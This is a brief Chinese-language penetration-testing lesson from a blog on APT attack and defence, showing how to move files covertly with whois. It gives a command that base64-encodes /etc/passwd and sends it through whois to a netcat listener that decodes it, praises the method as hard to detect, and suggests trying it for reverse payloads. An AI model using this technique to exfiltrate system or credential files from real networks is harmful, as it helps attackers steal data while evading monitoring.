第五十三課:內(nèi)網(wǎng)滲透中的文件傳輸
專注APT攻擊與防御
https://micropoor.blogspot.com/
利用whois傳輸文件:
傳輸機(jī):
root@john:~# whois -h 127.0.0.1 -p 4444 `cat /etc/passwd | base64`
接受機(jī):
root@john:/tmp# nc -l -v -p 4444 | sed "s/ //g" | base64 -d
優(yōu)點:適用于隱蔽傳輸,。最小化被發(fā)現(xiàn),。
缺點:適用于傳輸小文件,。
后者的話:whois是否同樣適用于payload的反彈,是一個非常有趣的實驗,。
Micropoor
?
